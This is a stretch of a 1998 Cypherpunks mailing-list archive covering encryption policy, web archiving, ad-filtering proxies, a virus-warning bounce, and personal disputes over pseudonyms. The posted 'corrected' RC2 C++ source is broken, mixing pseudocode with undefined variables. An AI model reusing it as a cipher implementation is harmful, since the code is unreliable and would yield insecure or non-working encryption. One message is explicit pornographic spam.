> of the Web for footnote citations, legal citations, references, etc.
> Scientific or academic articles cannot reliably cite URLs, as they are
> likely to decay or vanish or become corrupted over a matter of months, let
> alone the years or decades that a technical or academic paper is expected
> to last and be read. Call it an archivist's nightmare.

[skip to discussion of a market solution]

> A market fix might be the following:
> 
> - a site operator offers "archival" storage, perhaps/probably for a fee
> 
> - files could be placed in this archival storage for some fee for a given
> amount of time. (Given the declining cost of storage, a user might be able
> to economically buy "permanent" storage, sort of a "discounted future
> value" approach. Thus, I might pay $20 to store the Cyphernomicon for a
> year, $30 for 3 years, and $50 for "eternity."
> 
> - he may also charge digital cash for access (a separable issue, but worth
> mentioning)

Another model would be advertising supported.  In this model, a business
collects important documents, sources, and so on, and makes them generally
available.  A search engine at the site home helps index it, and provides
banner advertisements as well.

The advertisement supported model works for the search engines, and this
would have the advantage of avoiding both broken links and useless drivel.
Free access and free submission may be necessary to get both enough
documents and users to be profitable.

[snip]

> --Tim May

Jon Leonard





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Fri, 30 Jan 1998 07:40:08 +0800
To: cypherpunks@cyberpass.net
Subject: FBI tells Congress encryption "is a critical problem"
Message-ID: <Pine.GSO.3.95.980129144459.13402P-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Wed, 28 Jan 1998 13:46:48 -0800 (PST)
From: Declan McCullagh <declan@well.com>
To: politech@vorlon.mit.edu
Subject: FBI tells Congress encryption "is a critical problem"

********

The nation's top cops aren't happy about Americans using
data-scrambling software to shield their correspondence
from prying eyes. Today the deputy director of the FBI told
the Senate Intelligence committee that encryption "is a
critical problem" that Congress needs to solve --
presumably by banning email and other programs that his
G-men can't crack.
  (http://cgi.pathfinder.com/netly/opinion/0,1042,1385,00.html).
Bob Bryant warned the committee that "the widespread use of
robust non-key recovery encryption will ultimately devastate our
ability to fight crime and prevent terrorism."

Which is precisely what Sen. Bob Kerrey (D-Neb) claims he's
concerned about. He said "if we want to make the American
people continue to feel safe," the National Security Agency
and the FBI "have to be able to somehow deal with not just
the complexity of signals, but increasingly encrypted
signals that are impossible for us to break." Not
surprisingly, the question of why the FBI and NSA should
have the ability to listen in on any conversation was left
unasked. --By Declan McCullagh/Washington (declan@well.com)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 30 Jan 1998 05:08:03 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Senate probes Microsoft [CNN]
Message-ID: <199801292105.PAA14122@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>    By SCOTT SONNER
>    Associated Press Writer
>    
>     WASHINGTON (AP) -- Microsoft, already in trouble with the
>    JusticeDepartment for alleged antitrust violations, also is the target
>    ofa Senate Judiciary Committee investigation, a Senate aide saidtoday.
>    
>     "They are definitely investigating Microsoft," said TonyWilliams,
>    chief of staff to Sen. Slade Gorton, R-Wash. "They aremeeting with
>    Microsoft. They are talking with them about antitrustmatters."
>    
>     Microsoft had no immediate comment today but Williams said
>    thecommittee has asked Microsoft to voluntary turn over
>    documentsregarding its business practices.
>    
>     The committee for some time has been reviewing the activities
>    ofMicrosoft and other companies in regard to how antitrust laws
>    applyto the Internet.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Fri, 30 Jan 1998 08:01:46 +0800
To: cypherpunks@cyberpass.net
Subject: SF Chron article on Feinstein and Internet
Message-ID: <Pine.GSO.3.95.980129150819.13402T-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



A reporter (jswartz@sfgate.com) is writing an article about Dianne
Feinstein and her puzzling stance on high tech issues, given the state she
represents. She's taken very odd positions on encryption, Net-gambling,
privacy regulations that put burdens on business, and of course her
bomb-making ban. 

If you have Feinstein stories or opinions, I'm sure he'd love to hear from
you.

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SteffenHo@aol.com
Date: Fri, 30 Jan 1998 05:04:27 +0800
To: cypherpunks@toad.com
Subject: Re: hackers  and minick
Message-ID: <685d8d88.34d0eafa@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



In a message dated 98-01-29 15:44:07 EST, kes21@chat.ru writes:

<< Hello  there!!! I send this letter because   i  want to know anything about
 hackers Kevin  
 Mitnick    please send more information about  these   topics my E-mail
 kes21@chat.ru
  >>


www.mitnick.com or www.kevinmitnick.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Fri, 30 Jan 1998 09:15:08 +0800
To: cypherpunks@toad.com
Subject: Re: Chris Lewis's death?
In-Reply-To: <199801152323.SAA14920@panix2.panix.com>
Message-ID: <b3cb531d15f740612b6ba5796ac340f5@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain



Information Security (if that is his real name) writes:

>    vznuri@netcom.com   "Vladimir Z. Nuri" (nym for Dr. Dim)

You mean, Vlad is Larry Detweiler and Dmitri Vulis in the same time?
Hmmm ...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 30 Jan 1998 10:42:55 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Govt. to overhaul domain names [CNN]
Message-ID: <199801300240.UAA15427@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text




Forwarded message:

>           GOVERNMENT TO UNVEIL PLAN TO OVERHAUL INTERNET DOMAIN NAMES
>                                        
>      graphic January 29, 1998
>      Web posted at: 6:53 p.m. EDT (1853 GMT)
>      
>      WASHINGTON (Reuters) - The Clinton administration's eagerly awaited
>      proposal for overhauling the Internet's naming system and phasing
>      out U.S. government involvement will be released Friday, the
>      Commerce Department said Thursday.
>      
>      The department's National Telecommunications and Information
>      Administration unit said it will post the plan on the World Wide Web
>      at http://www.ntia.doc.gov.
>      
>      The plan, originally expected in November, seeks to resolve the
>      controversy over management of some of the Internet's most basic
>      functions, including the assignment and registration of names for
>      Web sites.

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 30 Jan 1998 10:43:19 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Michigan upset - children fingerprinted w/o permission [CNN]
Message-ID: <199801300241.UAA15465@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>    
>                CHILDREN'S FINGERPRINTING RILES MICHIGAN PARENTS
>                                        
>      fingerprint graphic January 29, 1998
>      Web posted at: 3:51 p.m. EST (2051 GMT)
>      
>      DETROIT (AP) -- Parents and legal experts have identified a problem
>      with Michigan standardized testing -- 122,000 fifth-graders provided
>      their fingerprints without permission.
>      
>      The public-school children had to fill out a "Fingerprint
>      Investigation Journal" as part of the science segment on the
>      Michigan Educational Assessment Program.
>      
>      "It's offensive," said Andrea Lang of St. Clair Shores, who learned
>      that her 10-year-old daughter provided fingerprints for the test
>      last week. "It's an invasion of privacy. Only criminals get their
>      fingerprints taken."
>      
>      The fingerprint journal was merely a hands-on experiment designed to
>      make the science portion of the test more interesting, Peter Bunton
>      of the MEAP office, said Wednesday.
>      
>      State law says that with few exceptions, children's fingerprints
>      can't be obtained without parents' permission. Bunton said he was
>      unaware of the law.

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sources Briefings & eJOURNAL, DSO Inc." <sales@dso.com> (by way ofSteve Schear)
Date: Sun, 1 Feb 1998 06:48:22 +0800
To: cypherpunks@cyberpass.net
Subject: DEBATE IN THE INTELLIGENCE COMMUNITY
Message-ID: <v03102801b0f72761b21f@[208.129.55.202]>
MIME-Version: 1.0
Content-Type: text/plain



********IF YOU WISH TO BE REMOVED FROM THIS MAILING LIST, PLEASE REPLY WITH
SUBJECT: "REMOVE"************

FOR IMMEDIATE RELEASE:	INFORMATION CONTACT:Cynthia Johnston 415 731-1905,
pr@dso.com


REPORT IN SOURCES BRIEFINGS STIRS HEATED DEBATE IN INTELLIGENCE COMMUNITY


San Francisco, CA.  SOURCES BRIEFINGS, a newsletter delivering raw
intelligence, reported recently that CIA Inspector General Fredrick Hitz
has declared open source intelligence a waste of time and money -- and
hit a raw nerve in the intelligence community.

The CIA Inspector General, speaking about the CIA's role in todays
intelligence structure, admitted that he feels threatened by the presence
of those in private industry and in government who are pursuing
intelligence in new ways. He says that private industry is actually ahead
of the CIA in technologies such as satellite imaging and encryption,
according to the article in the current issue of SOURCES BRIEFINGS
(www.dso.com).

Even though Hitz says he finds the new computer encryption and information
systems incredibly terrifying, he dismisses open source intelligence,
inside and outside of the government agencies, as merely a collection of
newspaper stories on various issues...

SOURCES BRIEFINGS subscribers in the intelligence community were quick to
challenge Hitz assertions. A senior Pentagon official with access to the
Secretary of Defense stated, Mr. Hitz may have revealed more than he
intended regarding the mindset that often holds the Intelligence Community
(IC) hostage. Secrets can be addictive and like potato chips it is hard
just to have one. It is easy to binge on them and end up without a well
balanced intelligence diet. The IC gets addicted to its own secrets and
[gets] fat on classified self-importance.

Robert Steele, CEO of Open Source Solutions Inc., joined the battle saying,
We are at a very important cross-roads in the history and maturity of the
U.S. intelligence community... The Commission on Intelligence found that
its access to open sources is severely deficient and should be a top
priority...

Open sources are of proven value in tip-off, in guiding secret collection,
in placing secret information in context, and in providing cover for
secretly obtained information which must be shared with coalition partners
to whom secret sources and methods cannot or should not be revealed.

An NSA officer on loan to the military said, This guy's parochial,
narrow-minded, elitist thinking (Leave it to the patrician professionals,
you fumbling amateurs) perfectly embodies what is, and has for a long
time, been wrong with the CIA. I suspect that one reason for this
gentleman's self-admitted fear is that the CIA doesn't really have that
many truly clandestine sources, and he's afraid people will learn just how
much OSINT is a better value for dollars expended.

Responses to Hitz remarks continue to pour in to SOURCES and the editors
are preparing to devote space exclusively to this debate.

A sample of SOURCES BRIEFINGS, as well as subscription information can be
obtained online at http://www.dso.com or by calling 1-888-8-DSO-COM
(1-888-8-376-266).

For further information, or to set up interviews with SOURCES seasoned
investigative journalists, intelligence experts and banking specialists,
please contact Cynthia Johnston at 415 731-1905 or at pr@dso.com.

###






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "=?KOI8-R?Q?=EF=E5=ED_=F0=CF=CC=D8=DA=CF=D7=C1=D4=C5=CC=D8?=" <kes21@chat.ru>
Date: Fri, 30 Jan 1998 04:22:42 +0800
To: <cypherpunks@toad.com>
Subject: Re: hackers  and minick
Message-ID: <199801292004.XAA16433@chat.ru>
MIME-Version: 1.0
Content-Type: text/plain



Hello  there!!! I send this letter because   i  want to know anything about
hackers Kevin  
Mitnick    please send more information about  these   topics my E-mail
kes21@chat.ru





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Fri, 30 Jan 1998 13:10:00 +0800
To: cypherpunks@toad.com
Subject: The source code of corrected RC2
Message-ID: <0fe5fadc61be81f09e058b9e6ca24c07@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain




There was a mistake in the source code of RC2 that I did a mailbox on January 21 '1998. 
The following is the source code of corrected RC2. 


RC2 C++ source code

#include <string.h>
#include <assert.h>

void RC2Keyschedule::schedule( unsigned short K[64], const unsigned char L[128], unsigned T8, unsigned TM )

        {
        unsigned char x;
        unsigned i;

        static const unsigned char PITABLE[256] = {
            217,120,249,196, 25,221,181,237, 40,233,253,121, 74,160,216,157,
            198,126, 55,131, 43,118, 83,142, 98, 76,100,136, 68,139,251,162,
             23,154, 89,245,135,179, 79, 19, 97, 69,109,141,  9,129,125, 50,
            189,143, 64,235,134,183,123, 11,240,149, 33, 34, 92,107, 78,130,
             84,214,101,147,206, 96,178, 28,115, 86,192, 20,167,140,241,220,
             18,117,202, 31, 59,190,228,209, 66, 61,212, 48,163, 60,182, 38,
            111,191, 14,218, 70,105,  7, 87, 39,242, 29,155,188,148, 67,  3,
            248, 17,199,246,144,239, 62,231,  6,195,213, 47,200,102, 30,215,
              8,232,234,222,128, 82,238,247,132,170,114,172, 53, 77,106, 42,
            150, 26,210,113, 90, 21, 73,116, 75,159,208, 94,  4, 24,164,236,
            194,224, 65,110, 15, 81,203,204, 36,145,175, 80,161,244,112, 57,
            153,124, 58,133, 35,184,180,122,252,  2, 54, 91, 37, 85,151, 49,
             45, 93,250,152,227,138,146,174,  5,223, 41, 16,103,108,186,201,
            211,  0,230,207,225,158,168, 44, 99, 22,  1, 63, 88,226,137,169,
             13, 56, 52, 27,171, 51,255,176,187, 72, 12, 95,185,177,205, 46,
            197,243,219, 71,229,165,156,119, 10,166, 32,104,254,127,193,173
        };

        assert(len > 0 && len <= 128);
        assert(bits <= 1024);
        if (!bits)
                bits = 1024;

        memcpy(xkey, key, len);
        
        for (i = 0; i < 128; i++) {
                L[i] = PITABLE[L[i-1] + L[i-T]];
        }
        
        T8 = (T1+7) >> 3;
        TM = 255 MOD 2^(8 + T1 - 8*T8);

        L[128-T8] = PITABLE[L[128-T8] & TM];

        for (i = 0; i < 127-T8; i++) {
                L[i] = PITABLE[L[i+1] XOR L[i+T8]];
        };

        i = 63;
        
        K[i] = L[2*i] + 256*L[2*i+1];
        };

void RC2Encryption::ProcessBlock( const unsigned short K[64], )
        {
        unsigned R3, R2, R1, R0, i;

        for (i = 0; i < 16; i++) {
                R0 += (R1 & ~R3) + (R2 & R3) + K[4*i+0];
                R0 = R0 << 1;
                
                R1 += (R2 & ~R0) + (R3 & R0) + K[4*i+1];
                R1 = R1 << 2;

                R2 += (R3 & ~R1) + (R0 & R1) + K[4*i+2];
                R2 = R2 << 3;

                R3 += (R0 & ~R2) + (R1 & R2) + K[4*i+3];
                R3 = R3 << 5;

                if (i == 4 || i == 10) {
                        R0 += K[R3 & 63];
                        R1 += K[R0 & 63];
                        R2 += K[R1 & 63];
                        R3 += K[R2 & 63];
                }
        }

void RC2Decryption::ProcessBlock( const unsigned short K[64], )
        {
        unsigned R3, R2, R1, R0, i;

        for (i = 0; i < 16; i++) {
                R3 = R3 << 5;
                R3 += (R0 & ~R2) + (R1 & R2) + K[4*i-3];

                R2 = R2 << 3;
                R2 += (R3 & ~R1) + (R0 & R1) + K[4*i-2];

                R1 = R1 << 2;
                R1 += (R2 & ~R0) + (R3 & R0) + K[4*i-1];

                R0 = R0 << 1;
                R0 += (R1 & ~R3) + (R2 & R3) + K[4*i-0];

                if (i == 4 || i == 10) {
                        R3 -= K[R2 & 63];
                        R2 -= K[R1 & 63];
                        R1 -= K[R0 & 63];
                        R0 -= K[R3 & 63];
                }
        }








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ulf@fitug.de (Ulf =?iso-8859-1?Q?M=F6ller?=)
Date: Fri, 30 Jan 1998 09:38:46 +0800
To: cypherpunks@toad.com
Subject: Re: patent office and key recovery
In-Reply-To: <3.0.5.32.19980129053039.00798ae0@popd.ix.netcom.com>
Message-ID: <m0xy3TR-0003b8C@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain



>	"The agency wants to include a "key recovery" system in the
>	software in case the encryption has to be broken."
>
>The mind boggles.

The Patent Office is obliged to submit all patent applications to the
spooks for review (as patent attorney Axel Horns pointed out on
another list). So there is little "need" for "recovery" even from the
government point of view, other than getting people to use key escrow.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 30 Jan 1998 16:45:25 +0800
To: freedom-knights@jetcafe.org
Subject: Re: Kooks and their Kookies
In-Reply-To: <3.0.5.32.19980128133516.009da320@labg30>
Message-ID: <Nc14Je9w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



> I have used Eric's Cookie Jar proxy to filter out cookies (it's located at
> http://www.lne.com/ericm/cookie_jar/ ) and modified it to replace
> advertisement images with a small jpeg image of a tin of spam.  (Cookie
> Jar's behavior is to simply close the connection which results in a
> "broken" icon in my browser.  The user is unable to discern the difference
> between a broken picture vs. a piece of intentionally ignored spam.)  I did
> it by returning the spam can instead of an advertising banner when
> requested, but I probably could have accomplished the same thing by
> modifying the incoming HTML to have an IMG SRC of

Junkbuster, which I've been playing with, too has just a list of URL
patterns that are blocked. When it encounters such an URL, it
displays this hardcoded spiel:

char CBLOCK[] = "HTTP/1.0 202 Request for blocked URL\n"
		 "Pragma: no-cache\n"
		 "Last-Modified: Thu Jul 31, 1997 07:42:22 pm GMT\n"
		 "Expires:       Thu Jul 31, 1997 07:42:22 pm GMT\n"
		 "Content-Type: text/html\n\n"
		 "<html>\n"
		 "<head>\n"
		 "<title>Internet Junkbuster: Request for blocked URL</title>\n"
		 "</head>\n"
		 WHITEBG
		 "<center>"
		 "<a href=http://internet.junkbuster.com/ij-blocked-url?%s+%s+%s>"
		 BANNER
		 "</a>"
		 "</center>"
		 "</body>\n"
		 "</html>\n"
		 ;

Notice something unpleasant!!! See the 2 %s's? They are filled with
1) the URL you tried to access, 2) the pattern from the blockfile that matched.
But they're not just displayed in your browser; only if you click on the
junkbuster logo, they are passed to a cgi script at the junkbusters site,
which displays them and possibly logs them.  Not nice at all.

I'd much prefer a filtering proxy that
allowed different actions for different patterns in the block file:
at the very least, the choices should be "404 not found", "403 verbotten",
a 1x1 jpg, and a user-specified replacement text/url.

> http://localhost/spam.jpg.  I was really trying to write code to eliminate
> the entire spam anchor, but found that identifying the matching start and
> end of the spam anchor (in PERL) was more work than it was worth, and was
> breaking some HTML.

The ability to edit the incoming text and pictures to delete embedded ads
would be awfully nice.  Consider for example the html dynamically generated
by wired's cgi script when you access http://stocks.hotbox.com.
(take a look at it).
Wouldn't it be nice if the proxy could be told to delete or replace all the
text between <!-- ad strip --> and <!-- end ad strip -->???

Occasionally an ad is embedded in a picture together with some useful
information.  Take a look at http://www.bloomberg.com/gifs/iview.gif.
it has both useful information that should be displayed and sponsor
informaion that should be mercilessly censored - replaced by a user-specified
graphic or at least a black rectangle.

> Anyway, yes, keep posting your lists of evil URLs.  I have no moral problem
> with trashing those unwanted ads.

Instead of spamming the mailing list, I've put up a web page at
http://www.geocities.com/CapeCanaveral/Hangar/6354
(let's see if they pull the plug on it)

> >Would there be any interest if I put an anootated netscape cookie file
> >(cypherpunks cookie potluck) someplace like geocitie.com?

I have also placed some cookies for sharing on them same web site.

> >Also a composite blockfile for junkbusters and other filtering proxies.
> >
> >A really neat feature for ad-filtering proxies would be to be able to
> >place a specified picture (or at least a black rectangle) over a jpg or
> >gif file being received from a URL that matches a specified pattern.
> >I'm not sufficiently handy with graphics file formats to tell how easy
> >this would be.

Death to the Usenet Cabal!

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Voyeur@generalmedia.com
Date: Fri, 30 Jan 1998 16:01:15 +0800
To: cypherpunks@Algebra.COM
Subject: Penthouse Virtual Voyeur
Message-ID: <199801300753.CAA19517@host3.generalmedia.com>
MIME-Version: 1.0
Content-Type: text/plain



Thank you!

Here is the entry to the Penthouse Virtual Voyeur which you requested.
http://www.penthousemag.com/pictorial/entry.html


PENTHOUSE KEEPS IT COMING!
TRY IT NOW... FREE FREE FREE!!!
http://www.penthousemag.com/sex/

MORE HOT NEWS
FROM PENTHOUSE ...
THE WORLD LEADER
IN EROTIC ENTERTAINMENT

WARM ... WET ... WONDERFUL
http://www.penthousemag.com/promo/pee/index.html
COME SEE WHY WETTER IS ALWAYS BETTER
IN THE AMAZING PENTHOUSE PEE GALLERY!!!!

NOW WAITING FOR YOU
INSIDE THE PENTHOUSE PRIVATE COLLECTION....
Penthouse Pets
Lesbian Lovers
3-Girl Orgies
Hot Horny Couples
Member Requests
Best Breasts
REAL PENTHOUSE VIDEOS
THE WORLD-FAMOUS, SUPERHOT STRONGBOX
And Much Much More!
See It Now
FREE FREE FREE... http://www.penthousemag.com/sex/

NEW FOR YOU
IN THE PENTHOUSE PRIVATE COLLECTION:
SIZZLING, INTENSE SEX PHOTOGRAPHY
OF THE HOTTEST PENTHOUSE MODELS EVER!

See Them Now
FREE FREE FREE ... http://www.penthousemag.com/sex/

Terri Peake
Amy Lynn Baxter
Alexus Winston
Hyapatia Lee
Justine Delahunty
Gina LaMarca
Danielle Daneux
Levena Holmes
Stacy Moran
Christy Canyon
Dancing With Wolf
Alexis Christian
Mirror Image - The Outtakes
Paige Summers - 1998 Pet of the Year
Star Whores - The Outtakes
Eva Major - The Outtakes
Eva Major - Fan Gallery

PENTHOUSE KEEPS IT COMING STRONG FOR YOU ...
NOW TRY IT FREE at
http://www.penthousemag.com/sex/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@cor.sos.sll.se>
Date: Fri, 30 Jan 1998 10:26:03 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Persistent URLs Considered Useful
In-Reply-To: <v03102800b0f67987a920@[207.167.93.63]>
Message-ID: <Pine.HPP.3.91.980130023023.25168D-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain



Librarians have been busy in this area. Electronic journals
will soon (well, it will take a few years...) become the
prefered method for scientific publishing. Pre-publishing,
peer-review, certification, post-certification addenda (and
sometimes even revocation, if cheating has been proven).
Similar methods have been used in the technical development
of the Internet for decades but now other fields are catching
on.

An example of public peer-review techniques
http://www.mja.com.au/review/oprtprot.html

A functioning and respected scientific e-journal
http://www.cogsci.soton.ac.uk/bbs/

The Linkoping University Electronic Press
http://www.ep.liu.se/
and more specifically
http://www.ida.liu.se/ext/cgi-bin/epa/protect.html
describes PGP-signing the MD5 hashes of articles. They
will guarantee their on-line survival for 25 years. Also,
paper copies are stored in the deep archives of several
Swedish University libraries. I guess they don't guarantee
that the URL will stay the same for 25 years, but why not.


Asgaard





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 30 Jan 1998 12:10:33 +0800
To: cypherpunks@cyberpass.net
Subject: References to FTL tunneling experiment
In-Reply-To: <199801272132.PAA01922@einstein.ssz.com>
Message-ID: <199801300400.FAA17487@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Phelix wrote:

> I remember seeing on one of those science specials on The learning channel
> (or mabye the Discovery channel) that a professor did figure out
> (accidentally) how to send information faster than light.  The only thing I
> remember about it was the the signal was some kind of music.

http://i02aix1.desy.de/~mpoessel/nimtzeng.html
http://www.npl.washington.edu/AV/altvw75.html
http://www.uni-koeln.de/~abb11/
http://www.aei-potsdam.mpg.de/~mpoessel/nimtzeng.html
http://www.fringeware.com/msg/1996/msg00155.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Fri, 30 Jan 1998 20:24:05 +0800
To: cypherpunks@toad.com
Subject: Re: Chris Lewis's death?
Message-ID: <199801301214.HAA08770@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From cypherpunks-errors@toad.com Thu Jan 29 20:29:21 1998
   >   
   >   Information Security (if that is his real name) writes:
   >   
   >   >    vznuri@netcom.com   "Vladimir Z. Nuri" (nym for Dr. Dim)
   >   
   >   You mean, Vlad is Larry Detweiler and Dmitri Vulis in the same time?
   >   Hmmm ...

The above message was sent by Dr. Dim.
(He has a natural aversion to spelling his own name correctly
 when pretending to post as not Dr. Dim.)

And, yes, 'vznuri@netcom.com' is a nym for Dr. Dim: just check
out his posts at DejaNews...Dr. Dim is a math phud, and "Vladimir" was
"plonked" by Dr. Dim immediately after I said it was a nym.
---guy

   Dr. Dim had an infamous alias "Vladimir Fomin" too.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Fri, 30 Jan 1998 20:33:55 +0800
To: cypherpunks@toad.com
Subject: Re: tell me what you think of this RC2 C++ source code
Message-ID: <199801301227.HAA09182@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



#   Date: Thu, 22 Jan 1998 00:06:22 -0500
#   Message-ID: <7f7f70c39f30fd17d32c41b5bddb97b3@anon.efga.org>
#   Subject: tell me what you think of this RC2 C++ source code
#   To: cypherpunks@toad.com
#    
#   tell me what you think of this RC2 C++ source code

It sucked...there's an error.

---guy ;-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arturo Grapa Ysunza <agrapa@banamex.com>
Date: Fri, 30 Jan 1998 22:28:20 +0800
To: "'cypherpunks@toad.com>
Subject: VIRUS WARNING:
Message-ID: <c=MX%a=_%p=BANACCI%l=MEX3976BCAOP-980130141925Z-15764@mex3980jarop1.BANAMEX.COM>
MIME-Version: 1.0
Content-Type: text/plain



VIRUS WARNING: 

A message was received which contained a virus:

	From:		=?KOI8-R?Q?=EF=E5=ED_=F0=CF=CC=D8=DA=CF=D7=C1=D4=C5=CC=D8?=
	Address:	kes21@chat.ru
	Date:		Viernes 30 de Enero de 1998
	Time:		1:03:32 AM
	Subject:		Re: Programming 

This message contains 1 virus:

	Test2.com		infected with the BW.556/1001/1272 virus

This message was generated by ThunderBYTE Anti-Virus for MS Exchange
	http://www.thunderbyte.com/aboutmx.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: x <x@x.com>
Date: Sat, 31 Jan 1998 01:10:33 +0800
To: cypherpunks@Algebra.COM
Subject: stupid test (virus warning)
Message-ID: <3.0.32.19691231160000.006adbdc@shell15.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



 .... you get an email from .ru address, with small .com file attached.
 .... you think: "I shall run it!"

 .... you flunk.


DUUUUHHHH.
Hey, Mr. Lame .ru: give it up.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SteffenHo@aol.com
Date: Fri, 30 Jan 1998 22:36:57 +0800
To: cypherpunks@toad.com
Subject: Re: hackers  and minick
Message-ID: <ca3d52ce.34d1e1d0@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



In a message dated 98-01-29 15:44:07 EST, kes21@chat.ru writes:

>Hello  there!!! I send this letter because   i  want to know anything about
>hackers Kevin  
>Mitnick    please send more information about  these   topics my E-mail
>kes21@chat.ru

>www.mitnick.com or www.kevinmitnick.com



hola,

a hompage over his downfall   "http://www.takedown.com"
and  you can always read the book.

"The Smaurai and the Cyberthief"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 30 Jan 1998 22:26:53 +0800
To: cypherpunks@toad.com
Subject: New Rules on Classified Info
Message-ID: <1.5.4.32.19980130142212.0070b1e4@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



The Department of Defense has published today three 
interim final rules on protection of classified information
(apparently issued confidentially months ago):

32 CFR Part 147, Personnel Security Policies for Granting 
Access to Classified Information

32 CFR Part 148, National Policy on Reciprocity of Facilities 
and Guidelines for Implementation of Reciprocity

32 CFR Part 149, National Policy on Technical Surveillance 
Countermeasures

See at:

   http://jya.com/32cfr147.txt  (56K)

   http://jya.com/32cfr148.txt  (18K)

   http://jya.com/32cfr149.txt  (7K)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@mentat.com (Jim Gillogly)
Date: Sat, 31 Jan 1998 02:03:36 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Chaining ciphers
Message-ID: <9801301752.AA17574@mentat.com>
MIME-Version: 1.0
Content-Type: text/plain



> Jim Gillogly skribis:
> > One word of caution (which should be obvious, but can't hurt to repeat it):
> > if you chain ciphers (e.g. DES | IDEA | 3DES | CAST | Blowfish), be sure to
> > use separate keys for each of them; otherwise breaking the last one will
> > give the key to the whole lot.
> 
Matthew Ghio rispondis:
> Only if the cryptanalyst knows that the decryption of the last one was
> correct, which shouldn't be possible without also decrypting all the other
> layers.

If the person strapping those systems together writes them from scratch
and the penultimate cipher gives a flat distribution, then I agree
100%.  However, many (most?) standalone encryption programs will put a
